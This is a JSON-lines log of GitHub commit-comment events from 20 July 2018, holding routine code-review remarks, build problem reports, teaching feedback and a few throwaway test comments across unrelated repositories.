{"id":"7994759381","type":"CommitCommentEvent","actor":{"login":"GustavoCayres"},"repo":{"name":"LECC-IBU/ReDyMo"},"payload":{"comment":{"id":29778527,"position":null,"line":null,"path":null,"commit_id":"e9eb9bb2858ca9bf1184d23217e4d96d98a86b59","created_at":"2018-07-20T12:36:11Z","updated_at":"2018-07-20T12:36:11Z","author_association":"COLLABORATOR","body":"Bom dia, professor! Como vão as coisas?\r\n\r\nÀs vezes dou uma olhada nos avanços do projeto, você está com um problema com os _imports_?\r\nTalvez eu possa ajudar, mexi bastante com isso alguns meses atrás.\r\nQue dificuldade você está tendo com caminhos absolutos?\r\n\r\nAbraços!"}},"created_at":"2018-07-20T12:36:11Z"}
{"id":"7994764016","type":"CommitCommentEvent","actor":{"login":"ccwienk"},"repo":{"name":"gardener/cc-utils"},"payload":{"comment":{"id":29778555,"position":28,"line":143,"path":"concourse/client.py","commit_id":"b88478973b7587d416f19111cc96d9173b832934","created_at":"2018-07-20T12:37:11Z","updated_at":"2018-07-20T12:37:11Z","author_association":"MEMBER","body":"how about util.urljoin?"}},"created_at":"2018-07-20T12:37:11Z"}
{"id":"7994765330","type":"CommitCommentEvent","actor":{"login":"Sirius207"},"repo":{"name":"Dingrongdeer/X-Village-2018-Exercise"},"payload":{"comment":{"id":29778560,"position":null,"line":null,"path":null,"commit_id":"856209c28f82798a2ffeede96669ab703f9950e8","created_at":"2018-07-20T12:37:28Z","updated_at":"2018-07-20T12:37:28Z","author_association":"NONE","body":"OK<\r\n這樣你就知道python 的變數哪裡可以用哪裡不能用了"}},"created_at":"2018-07-20T12:37:28Z"}
{"id":"7994765645","type":"CommitCommentEvent","actor":{"login":"wangziyi0526"},"repo":{"name":"nnngu/MusicPhoto"},"payload":{"comment":{"id":29778561,"position":null,"line":null,"path":null,"commit_id":"9b6dd809b0f61b4dfbbba20b2c8c8fdbe98f6196","created_at":"2018-07-20T12:37:32Z","updated_at":"2018-07-20T12:37:32Z","author_association":"NONE","body":"npm install报错"}},"created_at":"2018-07-20T12:37:32Z"}
{"id":"7994766243","type":"CommitCommentEvent","actor":{"login":"xdd1996"},"repo":{"name":"PlatopiaCore/platopia"},"payload":{"comment":{"id":29778569,"position":null,"line":null,"path":null,"commit_id":"563c616db768f813aa4482d39d8ed1d8aacaad4f","created_at":"2018-07-20T12:37:40Z","updated_at":"2018-07-20T12:37:40Z","author_association":"NONE","body":"Come on, P T A!"}},"created_at":"2018-07-20T12:37:40Z"}
{"id":"7994768433","type":"CommitCommentEvent","actor":{"login":"MaximKitsenko"},"repo":{"name":"agileharbor/magentoAccess"},"payload":{"comment":{"id":29778575,"position":5,"line":171,"path":"src/MagentoAccess/Services/Rest/v2x/Repository/ProductRepository.cs","commit_id":"933423458dcf7c1b0b087a4bec166f4cb6851155","created_at":"2018-07-20T12:38:08Z","updated_at":"2018-07-20T12:38:08Z","author_association":"CONTRIBUTOR","body":"are you sure it is safe to decrease exception level?"}},"created_at":"2018-07-20T12:38:08Z"}
{"id":"7994769615","type":"CommitCommentEvent","actor":{"login":"ASKurz"},"repo":{"name":"ASKurz/recoding-Hayes-2018"},"payload":{"comment":{"id":29778579,"position":16,"line":11,"path":"index.rmd","commit_id":"6ab97c1e3aa877eac3de4442a173d854bdbb998f","created_at":"2018-07-20T12:38:25Z","updated_at":"2018-07-20T12:38:25Z","author_association":"OWNER","body":"Thanks for the help!\n\nOn Fri, Jul 20, 2018 at 1:28 AM, Yihui Xie <notifications@github.com> wrote:\n\n> FYI, description should be plain text and should not contain Markdown\n> syntax. You need to get rid of the hyperlinks.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ASKurz/recoding-Hayes-2018/commit/6ab97c1e3aa877eac3de4442a173d854bdbb998f#commitcomment-29774187>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AS_ozHM1frT6yuR7sw8Fsb7p9zCSJtbJks5uIWpngaJpZM4VXeZ0>\n> .\n>\n\n\n\n-- \nA. Solomon Kurz, M.A.\nGraduate Student\nUniversity of Mississippi\nDepartment of Psychology\najkurz@go.olemiss.edu\n(206) 954-1980\n"}},"created_at":"2018-07-20T12:38:25Z"}
{"id":"7994775622","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"nss-dev/nss"},"payload":{"comment":{"id":29778589,"position":null,"line":null,"path":null,"commit_id":"83607c30aabdea4f627ba0f2ac7cdd616af5a8e8","created_at":"2018-07-20T12:39:44Z","updated_at":"2018-07-20T12:39:44Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/github/v1/taskcluster-github-config.json#\nErrors:\n  * data should NOT have additional properties: \"scopes\"\n  * data.metadata.source should be string\n\n</details>"}},"created_at":"2018-07-20T12:39:44Z"}
{"id":"7994778486","type":"CommitCommentEvent","actor":{"login":"michael-o"},"repo":{"name":"apache/tomcat"},"payload":{"comment":{"id":29778594,"position":20,"line":419,"path":"java/org/apache/catalina/core/ApplicationContext.java","commit_id":"eb195bebac8239b994fa921aeedb136a93e4ccaf","created_at":"2018-07-20T12:40:20Z","updated_at":"2018-07-20T12:40:20Z","author_association":"MEMBER","body":"@markt-asf Just stumbled upon this in our code with the target path for `forward`: `/WEB-INF/fo00_1385+0.jsp`. `URLDecoder` is the wrong class to use in several spots if your grep for. Javadoc says:\r\n\r\nbq. Utility class for HTML form decoding. This class contains static methods for decoding a String from the `application/x-www-form-urlencoded` MIME format. This is *not* URI encoding. \r\n\r\nWhat happens in my case is that from `/WEB-INF/fo00_1385+0.jsp` `/WEB-INF/fo00_1385 0.jsp` arrives at the end. This looks plain wrong to me."}},"created_at":"2018-07-20T12:40:20Z"}
{"id":"7994787036","type":"CommitCommentEvent","actor":{"login":"SShumer"},"repo":{"name":"agileharbor/magentoAccess"},"payload":{"comment":{"id":29778617,"position":5,"line":171,"path":"src/MagentoAccess/Services/Rest/v2x/Repository/ProductRepository.cs","commit_id":"933423458dcf7c1b0b087a4bec166f4cb6851155","created_at":"2018-07-20T12:42:12Z","updated_at":"2018-07-20T12:42:12Z","author_association":"CONTRIBUTOR","body":"Yes. "}},"created_at":"2018-07-20T12:42:12Z"}
{"id":"7994790478","type":"CommitCommentEvent","actor":{"login":"anandakumarb"},"repo":{"name":"systemd/systemd"},"payload":{"comment":{"id":29778625,"position":null,"line":null,"path":null,"commit_id":"7c30c3c44f84421bbe510fb3339378e075b3ab48","created_at":"2018-07-20T12:42:57Z","updated_at":"2018-07-20T12:42:57Z","author_association":"NONE","body":"@poettering: Thanks for the clarification.\r\nI have one more query\r\n>patch only applies to log messages received through the venerable syslog protocol.\r\nThis means that when journald receives the log message from syslog protocol, journald will use the syslog's timestamp. \r\nFor example, when the below message is received through syslog protocol, then journald uses the syslog timestamp (Jul 20 15:48:38) as it is.?\r\nJul 20 15:48:38 test test[8088]: Hello World message \r\n\r\nIs my understanding correct?\r\n\r\nThanks in advance.\r\nAnanda"}},"created_at":"2018-07-20T12:42:57Z"}
{"id":"7994794587","type":"CommitCommentEvent","actor":{"login":"Sirius207"},"repo":{"name":"yuchun0524/X-Village-2018-Exercise"},"payload":{"comment":{"id":29778640,"position":null,"line":null,"path":null,"commit_id":"b20d7a909dc6b9352b952f69dcef5d6e3d3495fc","created_at":"2018-07-20T12:43:53Z","updated_at":"2018-07-20T12:43:53Z","author_association":"NONE","body":"沒錯，辛苦妳了\r\n寫成 class 之後，就可以很方便的建立 另一個 幾 x 幾的矩陣了"}},"created_at":"2018-07-20T12:43:53Z"}
{"id":"7994795195","type":"CommitCommentEvent","actor":{"login":"TomaszChmielPagepro"},"repo":{"name":"Pagepro/arbitrage-frontend"},"payload":{"comment":{"id":29778641,"position":54,"line":26,"path":"src/TableRow.tsx","commit_id":"a79e5c94193bbeca1a2810685f9faa48933c6793","created_at":"2018-07-20T12:44:00Z","updated_at":"2018-07-20T12:44:00Z","author_association":"COLLABORATOR","body":"New line here"}},"created_at":"2018-07-20T12:44:00Z"}
{"id":"7994795599","type":"CommitCommentEvent","actor":{"login":"chmst"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29778643,"position":null,"line":null,"path":null,"commit_id":"f8934bac251796a29ddc3316152e50ac81e7baf3","created_at":"2018-07-20T12:44:06Z","updated_at":"2018-07-20T12:44:06Z","author_association":"CONTRIBUTOR","body":"It works! Thank you @zero-24 "}},"created_at":"2018-07-20T12:44:06Z"}
{"id":"7994797132","type":"CommitCommentEvent","actor":{"login":"TomaszChmielPagepro"},"repo":{"name":"Pagepro/arbitrage-frontend"},"payload":{"comment":{"id":29778653,"position":61,"line":33,"path":"src/TableRow.tsx","commit_id":"a79e5c94193bbeca1a2810685f9faa48933c6793","created_at":"2018-07-20T12:44:26Z","updated_at":"2018-07-20T12:44:26Z","author_association":"COLLABORATOR","body":"Should be in line `32`"}},"created_at":"2018-07-20T12:44:26Z"}
{"id":"7994798097","type":"CommitCommentEvent","actor":{"login":"pieper"},"repo":{"name":"dcmjs-org/dicomweb-client"},"payload":{"comment":{"id":29778656,"position":null,"line":null,"path":null,"commit_id":"3f6492a7da5d42121c173f8522d9cf3045765f61","created_at":"2018-07-20T12:44:40Z","updated_at":"2018-07-20T12:44:40Z","author_association":"CONTRIBUTOR","body":"Looks great!  @hackermd should have a look too."}},"created_at":"2018-07-20T12:44:40Z"}
{"id":"7994799355","type":"CommitCommentEvent","actor":{"login":"dinkypumpkin"},"repo":{"name":"Marginal/docker-get_iplayer"},"payload":{"comment":{"id":29778659,"position":6,"line":6,"path":"pvr","commit_id":"5a73d171034849c65c48565e636973bea633c5a9","created_at":"2018-07-20T12:44:55Z","updated_at":"2018-07-20T12:44:55Z","author_association":"NONE","body":"rtmpdump itself was the culprit, so you won't see those problems any more, thankfully. Everything is HTTP these days, with timeouts in place at both ends."}},"created_at":"2018-07-20T12:44:55Z"}
{"id":"7994804637","type":"CommitCommentEvent","actor":{"login":"tchoi8"},"repo":{"name":"tchoi8/distributedwebofcare"},"payload":{"comment":{"id":29778679,"position":null,"line":null,"path":null,"commit_id":"9627986578f4d84c41ed529768e2b0f5bbe7c558","created_at":"2018-07-20T12:46:02Z","updated_at":"2018-07-20T12:46:02Z","author_association":"OWNER","body":"@yuekaim image for skillshare 4 was in wrong order. fixed with this commit. "}},"created_at":"2018-07-20T12:46:02Z"}
{"id":"7994804651","type":"CommitCommentEvent","actor":{"login":"MoaazGaballah"},"repo":{"name":"google/blockly-games"},"payload":{"comment":{"id":29778680,"position":null,"line":null,"path":null,"commit_id":"8b5f249671625afcb79358ef7d1fc5d931542e92","created_at":"2018-07-20T12:46:02Z","updated_at":"2018-07-20T12:46:02Z","author_association":"NONE","body":"Hello\r\n\r\nI am using windows, i cloned the code but i can't build it. \r\n\r\nthe issue's message is : \r\n\r\n![1](https://user-images.githubusercontent.com/31771418/42990965-36a52580-8c3f-11e8-87de-a7ebc107d0c2.png)\r\n\r\nwhat am i doing wrong ? any kind of help is appreciated \r\n\r\nThanks a lot\r\n"}},"created_at":"2018-07-20T12:46:02Z"}
{"id":"7994807332","type":"CommitCommentEvent","actor":{"login":"BAGELreflex"},"repo":{"name":"simplesamlphp/simplesamlphp"},"payload":{"comment":{"id":29778687,"position":null,"line":null,"path":null,"commit_id":"2f6f022cd713699060253a9883dcf229e9bfcedb","created_at":"2018-07-20T12:46:37Z","updated_at":"2018-07-20T12:46:37Z","author_association":"NONE","body":"```\r\n[centos@auth simplesamlphp]$ php bin/initMDSPdo.php\r\n/Initializing Metadata Database...\r\nJul 20 12:43:09 simplesamlphp WARNING [CL995cc8de] The configuration file '/var/www/html/simplesamlphp/config/config.php' generates output. Please review your configuration.\r\nSuccessfully initialized metadata database.\r\n```\r\n\r\nI added the change to my local environment, recreated the empty database, then successfully initialized the database using `initMDSPdo.php`. The message is now successful.\r\n\r\nI'm not certain what the config generating output is all about, but it seems unrelated to this issue."}},"created_at":"2018-07-20T12:46:37Z"}
{"id":"7994808664","type":"CommitCommentEvent","actor":{"login":"rstoyanchev"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29778689,"position":111,"line":286,"path":"spring-webflux/src/main/java/org/springframework/web/reactive/function/BodyExtractors.java","commit_id":"a410d90439e5f4a682287f144c98801f40afcc41","created_at":"2018-07-20T12:46:55Z","updated_at":"2018-07-20T12:46:55Z","author_association":"CONTRIBUTOR","body":"Shouldn't the `message instanceof` check be sufficient? "}},"created_at":"2018-07-20T12:46:55Z"}
{"id":"7994811219","type":"CommitCommentEvent","actor":{"login":"FuminZhou"},"repo":{"name":"FuminZhou/gradle"},"payload":{"comment":{"id":29778694,"position":null,"line":null,"path":null,"commit_id":"e2ab62a13cb581dd3322b531e9f00b7c3313c412","created_at":"2018-07-20T12:47:28Z","updated_at":"2018-07-20T12:47:28Z","author_association":"OWNER","body":"??? oehme, Why do you say this is fixed? I see that previous change moved the File.listRoots to be within the URI_SCHEME.matcher.  OK, so maybe it would be invoked left often... but still, when it does get passed that, every time it would call the File.listRoots directly - which so far in 11-ea is still a slow operation.  - And I propose the code should cache the result of the File.listRoots."}},"created_at":"2018-07-20T12:47:28Z"}
{"id":"7994813459","type":"CommitCommentEvent","actor":{"login":"MostafaAyesh"},"repo":{"name":"MostafaAyesh/OctoPrintPlugin"},"payload":{"comment":{"id":29778701,"position":5,"line":null,"path":"OctoPrintOutputDevice.py","commit_id":"f284dbf48386dc1906564d711bba44a5bbe0bcde","created_at":"2018-07-20T12:47:58Z","updated_at":"2018-07-20T12:47:58Z","author_association":"OWNER","body":"You're right, Thanks."}},"created_at":"2018-07-20T12:47:58Z"}
{"id":"7994817708","type":"CommitCommentEvent","actor":{"login":"ls0909"},"repo":{"name":"azzimuth/webogram"},"payload":{"comment":{"id":29778710,"position":null,"line":null,"path":null,"commit_id":"5d050df89ae1036ad358add42b96c92088474167","created_at":"2018-07-20T12:48:54Z","updated_at":"2018-07-20T12:48:54Z","author_association":"NONE","body":"5d050df"}},"created_at":"2018-07-20T12:48:54Z"}
{"id":"7994818341","type":"CommitCommentEvent","actor":{"login":"harshita009"},"repo":{"name":"harshita009/login_and_reg"},"payload":{"comment":{"id":29778712,"position":29,"line":24,"path":"login_user.js","commit_id":"9303372c84361da645b3b3dee66173d7ac2072b0","created_at":"2018-07-20T12:49:02Z","updated_at":"2018-07-20T12:49:02Z","author_association":"OWNER","body":"Will the token be stored on the front end side only for the purpose of reusing it?"}},"created_at":"2018-07-20T12:49:02Z"}
{"id":"7994819640","type":"CommitCommentEvent","actor":{"login":"ckddus1130"},"repo":{"name":"ckddus1130/WebSynthesis"},"payload":{"comment":{"id":29778718,"position":null,"line":null,"path":null,"commit_id":"80bd191ae2a179ce04edc234d6150b0ede34acf8","created_at":"2018-07-20T12:49:20Z","updated_at":"2018-07-20T12:49:20Z","author_association":"OWNER","body":"이 프로젝트는 댓글기능이 있는 게시판과 웹에서 데이터를 파싱해서 그래프를 만들고\r\n카카오 API를 사용한 포트폴리오 입니다."}},"created_at":"2018-07-20T12:49:20Z"}
{"id":"7994819859","type":"CommitCommentEvent","actor":{"login":"Sirius207"},"repo":{"name":"ian29285716/X-Village-2018-Exercise"},"payload":{"comment":{"id":29778719,"position":null,"line":null,"path":null,"commit_id":"93b9139ecbba8464fae9cb5c41bfe66b09f70ab2","created_at":"2018-07-20T12:49:23Z","updated_at":"2018-07-20T12:49:23Z","author_association":"NONE","body":"ok 兩份都沒問題，辛苦你了\r\n寫檔會很常用，練好沒煩惱。\r\n\r\n另外API 那一個其實可以思考，為什麼要直接取第一個 [0] 的天氣呢？  其實後面的 [1] 也是有天氣的，\r\n\r\n..\r\n..\r\n..\r\n..\r\n其實那個 API 他會取各國的天氣預報，所以 [0]只是其中一個天氣預報而已，他裡面有給準確度，其實應該要根據準確度高低來找。"}},"created_at":"2018-07-20T12:49:23Z"}
{"id":"7994824256","type":"CommitCommentEvent","actor":{"login":"SparksJ2"},"repo":{"name":"sorentycho/blackmirror"},"payload":{"comment":{"id":29778732,"position":null,"line":null,"path":null,"commit_id":"d126df826f635b656699331b3e0c352fdc58441a","created_at":"2018-07-20T12:50:19Z","updated_at":"2018-07-20T12:50:19Z","author_association":"NONE","body":"sorry to see the build date checks were not useful in the end. :)"}},"created_at":"2018-07-20T12:50:19Z"}
{"id":"7994831086","type":"CommitCommentEvent","actor":{"login":"tannerflick4"},"repo":{"name":"Altemio/SevenKingdoms-master"},"payload":{"comment":{"id":29778744,"position":null,"line":null,"path":null,"commit_id":"259bb284a2517d0f80f43a827038a2500747da46","created_at":"2018-07-20T12:51:45Z","updated_at":"2018-07-20T12:51:45Z","author_association":"COLLABORATOR","body":"Ok. I just dont like it when troop counts are little. sometimes counts had\nmore than kings :)\n\nOn Thu, Jul 19, 2018 at 10:04 PM Vierwood <notifications@github.com> wrote:\n\n> Not really when counts have as many men as kings.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Altemio/SevenKingdoms-master/commit/259bb284a2517d0f80f43a827038a2500747da46#commitcomment-29773155>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AM1_oJp3ICi5hi0LyXVTXPjIUl3CoLyhks5uITrKgaJpZM4VXVCR>\n> .\n>\n"}},"created_at":"2018-07-20T12:51:45Z"}
{"id":"7994832422","type":"CommitCommentEvent","actor":{"login":"harshita009"},"repo":{"name":"harshita009/login_and_reg"},"payload":{"comment":{"id":29778745,"position":4,"line":4,"path":"app.js","commit_id":"a40834b37421d80548ce2e5c3692aad786b1f197","created_at":"2018-07-20T12:52:02Z","updated_at":"2018-07-20T12:52:02Z","author_association":"OWNER","body":"I have stored db credentials and secret key  in .env file so this module was required."}},"created_at":"2018-07-20T12:52:02Z"}
{"id":"7994835396","type":"CommitCommentEvent","actor":{"login":"tvdijen"},"repo":{"name":"simplesamlphp/simplesamlphp"},"payload":{"comment":{"id":29778752,"position":null,"line":null,"path":null,"commit_id":"2f6f022cd713699060253a9883dcf229e9bfcedb","created_at":"2018-07-20T12:52:40Z","updated_at":"2018-07-20T12:52:40Z","author_association":"MEMBER","body":"Thanks for the feedback @BAGELreflex "}},"created_at":"2018-07-20T12:52:40Z"}
{"id":"7994838763","type":"CommitCommentEvent","actor":{"login":"tareefdev"},"repo":{"name":"tareefdev/prose"},"payload":{"comment":{"id":29778757,"position":null,"line":null,"path":null,"commit_id":"8c25a85b9b243ba98d0b0ed4615e1228f234981f","created_at":"2018-07-20T12:53:21Z","updated_at":"2018-07-20T12:53:21Z","author_association":"OWNER","body":"added language direction for arabic. #645"}},"created_at":"2018-07-20T12:53:21Z"}
{"id":"7994839300","type":"CommitCommentEvent","actor":{"login":"TomaszChmielPagepro"},"repo":{"name":"Pagepro/arbitrage-frontend"},"payload":{"comment":{"id":29778760,"position":11,"line":11,"path":"src/config/config.ts","commit_id":"a79e5c94193bbeca1a2810685f9faa48933c6793","created_at":"2018-07-20T12:53:29Z","updated_at":"2018-07-20T12:53:29Z","author_association":"COLLABORATOR","body":"Would be better to have config as object with options, something like this\r\n```\r\nconst config = {\r\n  get websocketBase () {\r\n    const protocol = window.location.protocol === \"https:\" ? \"wss:\" : \"ws:\"\r\n\r\n    return `${protocol}//${window.location.host}`\r\n  },\r\n  websockets: {\r\n    exchange: `${config.websocketBase}/ws/exchange`\r\n  },\r\n  api: {\r\n    config: '/api/...'\r\n  }\r\n}\r\n\r\nexport default config"}},"created_at":"2018-07-20T12:53:29Z"}
{"id":"7994839392","type":"CommitCommentEvent","actor":{"login":"Nausheenbelim"},"repo":{"name":"SLKTraining/First"},"payload":{"comment":{"id":29778762,"position":4,"line":136,"path":"pom.xml","commit_id":"8a15a3a9349e92ba1647a6a67506f625c23237b1","created_at":"2018-07-20T12:53:29Z","updated_at":"2018-07-20T12:53:29Z","author_association":"NONE","body":"Get lost"}},"created_at":"2018-07-20T12:53:29Z"}
{"id":"7994840140","type":"CommitCommentEvent","actor":{"login":"jurec72"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29778765,"position":null,"line":null,"path":null,"commit_id":"64ffc4fc004aa94b64d4a8f0d42ea10e63e2ca46","created_at":"2018-07-20T12:53:39Z","updated_at":"2018-07-20T12:53:39Z","author_association":"OWNER","body":"j"}},"created_at":"2018-07-20T12:53:39Z"}
{"id":"7994840597","type":"CommitCommentEvent","actor":{"login":"jurec72"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29778766,"position":null,"line":null,"path":null,"commit_id":"64ffc4fc004aa94b64d4a8f0d42ea10e63e2ca46","created_at":"2018-07-20T12:53:44Z","updated_at":"2018-07-20T12:53:44Z","author_association":"OWNER","body":"k"}},"created_at":"2018-07-20T12:53:44Z"}
{"id":"7994841107","type":"CommitCommentEvent","actor":{"login":"jurec72"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29778768,"position":null,"line":null,"path":null,"commit_id":"64ffc4fc004aa94b64d4a8f0d42ea10e63e2ca46","created_at":"2018-07-20T12:53:51Z","updated_at":"2018-07-20T12:53:51Z","author_association":"OWNER","body":"jh"}},"created_at":"2018-07-20T12:53:51Z"}
{"id":"7994841317","type":"CommitCommentEvent","actor":{"login":"harshita009"},"repo":{"name":"harshita009/login_and_reg"},"payload":{"comment":{"id":29778769,"position":13,"line":13,"path":"login_user.js","commit_id":"a40834b37421d80548ce2e5c3692aad786b1f197","created_at":"2018-07-20T12:53:53Z","updated_at":"2018-07-20T12:53:53Z","author_association":"OWNER","body":"No it is not required it was left here by mistake."}},"created_at":"2018-07-20T12:53:53Z"}
{"id":"7994841583","type":"CommitCommentEvent","actor":{"login":"jurec72"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29778770,"position":null,"line":null,"path":null,"commit_id":"64ffc4fc004aa94b64d4a8f0d42ea10e63e2ca46","created_at":"2018-07-20T12:53:56Z","updated_at":"2018-07-20T12:53:56Z","author_association":"OWNER","body":"kj"}},"created_at":"2018-07-20T12:53:56Z"}
{"id":"7994841838","type":"CommitCommentEvent","actor":{"login":"jurec72"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29778771,"position":null,"line":null,"path":null,"commit_id":"64ffc4fc004aa94b64d4a8f0d42ea10e63e2ca46","created_at":"2018-07-20T12:53:59Z","updated_at":"2018-07-20T12:53:59Z","author_association":"OWNER","body":"kh"}},"created_at":"2018-07-20T12:53:59Z"}
{"id":"7994842152","type":"CommitCommentEvent","actor":{"login":"jurec72"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29778773,"position":null,"line":null,"path":null,"commit_id":"64ffc4fc004aa94b64d4a8f0d42ea10e63e2ca46","created_at":"2018-07-20T12:54:03Z","updated_at":"2018-07-20T12:54:03Z","author_association":"OWNER","body":"tdf"}},"created_at":"2018-07-20T12:54:03Z"}
{"id":"7994842421","type":"CommitCommentEvent","actor":{"login":"jurec72"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29778774,"position":null,"line":null,"path":null,"commit_id":"64ffc4fc004aa94b64d4a8f0d42ea10e63e2ca46","created_at":"2018-07-20T12:54:06Z","updated_at":"2018-07-20T12:54:06Z","author_association":"OWNER","body":"ljh"}},"created_at":"2018-07-20T12:54:06Z"}
{"id":"7994843582","type":"CommitCommentEvent","actor":{"login":"jurec72"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29778778,"position":null,"line":null,"path":null,"commit_id":"64ffc4fc004aa94b64d4a8f0d42ea10e63e2ca46","created_at":"2018-07-20T12:54:20Z","updated_at":"2018-07-20T12:54:20Z","author_association":"OWNER","body":"k"}},"created_at":"2018-07-20T12:54:20Z"}
{"id":"7994843796","type":"CommitCommentEvent","actor":{"login":"richelbilderbeek"},"repo":{"name":"mywtfmp3/boost_graph_cookbook_2"},"payload":{"comment":{"id":29778779,"position":null,"line":null,"path":null,"commit_id":"f003aa9368ea559d4f67a5d4785533754fb4cb8c","created_at":"2018-07-20T12:54:22Z","updated_at":"2018-07-20T12:54:22Z","author_association":"COLLABORATOR","body":"That looks awesome :+1:!"}},"created_at":"2018-07-20T12:54:22Z"}
{"id":"7994843887","type":"CommitCommentEvent","actor":{"login":"jurec72"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29778780,"position":null,"line":null,"path":null,"commit_id":"64ffc4fc004aa94b64d4a8f0d42ea10e63e2ca46","created_at":"2018-07-20T12:54:23Z","updated_at":"2018-07-20T12:54:23Z","author_association":"OWNER","body":"p"}},"created_at":"2018-07-20T12:54:23Z"}
{"id":"7994844320","type":"CommitCommentEvent","actor":{"login":"Nausheenbelim"},"repo":{"name":"SLKTraining/First"},"payload":{"comment":{"id":29778784,"position":12,"line":144,"path":"pom.xml","commit_id":"8a15a3a9349e92ba1647a6a67506f625c23237b1","created_at":"2018-07-20T12:54:29Z","updated_at":"2018-07-20T12:54:29Z","author_association":"NONE","body":"test"}},"created_at":"2018-07-20T12:54:29Z"}
{"id":"7994844897","type":"CommitCommentEvent","actor":{"login":"harshita009"},"repo":{"name":"harshita009/login_and_reg"},"payload":{"comment":{"id":29778787,"position":18,"line":18,"path":"register_user.js","commit_id":"a40834b37421d80548ce2e5c3692aad786b1f197","created_at":"2018-07-20T12:54:37Z","updated_at":"2018-07-20T12:54:37Z","author_association":"OWNER","body":"yes this can be done will change accordingly."}},"created_at":"2018-07-20T12:54:37Z"}
{"id":"7994844959","type":"CommitCommentEvent","actor":{"login":"Nausheenbelim"},"repo":{"name":"SLKTraining/First"},"payload":{"comment":{"id":29778788,"position":13,"line":145,"path":"pom.xml","commit_id":"8a15a3a9349e92ba1647a6a67506f625c23237b1","created_at":"2018-07-20T12:54:37Z","updated_at":"2018-07-20T12:54:37Z","author_association":"NONE","body":"test"}},"created_at":"2018-07-20T12:54:37Z"}
{"id":"7994845822","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29778791,"position":null,"line":null,"path":null,"commit_id":"7d9c97d66141d35d00258fe544211d9fd7f79a76","created_at":"2018-07-20T12:54:48Z","updated_at":"2018-07-20T12:54:48Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/url-to-filter-by-category-and-create-a-new-topic/91221/7\n"}},"created_at":"2018-07-20T12:54:48Z"}
{"id":"7994846161","type":"CommitCommentEvent","actor":{"login":"gunnarmorling"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":29778792,"position":21,"line":21,"path":"posts/Guillaume/2018-07-23-hibernate-orm-533-final-out.adoc","commit_id":"2dd4dcdecf4808ca53e1887c5d441d5f498919fc","created_at":"2018-07-20T12:54:53Z","updated_at":"2018-07-20T12:54:53Z","author_association":"MEMBER","body":"I don't quite get that sentence; so if it were only regressions from 5.2, then I shouldn't think about upgrading? Somehow the logic sounds odd to me."}},"created_at":"2018-07-20T12:54:53Z"}
{"id":"7994849930","type":"CommitCommentEvent","actor":{"login":"Sirius207"},"repo":{"name":"ian29285716/X-Village-2018-Exercise"},"payload":{"comment":{"id":29778806,"position":null,"line":null,"path":null,"commit_id":"0780e5a4c7ea5dfd541068102ae703f64b7aaffa","created_at":"2018-07-20T12:55:38Z","updated_at":"2018-07-20T12:55:38Z","author_association":"NONE","body":"ok，沒問題，辛苦了，這樣你應該就有class的基礎了"}},"created_at":"2018-07-20T12:55:38Z"}
{"id":"7994850820","type":"CommitCommentEvent","actor":{"login":"gunnarmorling"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":29778807,"position":19,"line":19,"path":"posts/Guillaume/2018-07-23-hibernate-orm-533-final-out.adoc","commit_id":"2dd4dcdecf4808ca53e1887c5d441d5f498919fc","created_at":"2018-07-20T12:55:50Z","updated_at":"2018-07-20T12:55:50Z","author_association":"MEMBER","body":"Perhaps mention at least one or two important bugs fixed? Right now it's a bit of a non-announcement."}},"created_at":"2018-07-20T12:55:50Z"}
{"id":"7994851157","type":"CommitCommentEvent","actor":{"login":"jurec72"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29778810,"position":null,"line":null,"path":null,"commit_id":"64ffc4fc004aa94b64d4a8f0d42ea10e63e2ca46","created_at":"2018-07-20T12:55:54Z","updated_at":"2018-07-20T12:55:54Z","author_association":"OWNER","body":"gfb"}},"created_at":"2018-07-20T12:55:54Z"}
{"id":"7994851421","type":"CommitCommentEvent","actor":{"login":"basil-conto"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":29778811,"position":null,"line":null,"path":null,"commit_id":"d1d567ac6fb70b88342d9db4db2b2d4f89c10e29","created_at":"2018-07-20T12:55:58Z","updated_at":"2018-07-20T12:55:58Z","author_association":"CONTRIBUTOR","body":"Huh. I'll look into that when I'm back at a computer (mostly out of curiosity)."}},"created_at":"2018-07-20T12:55:58Z"}
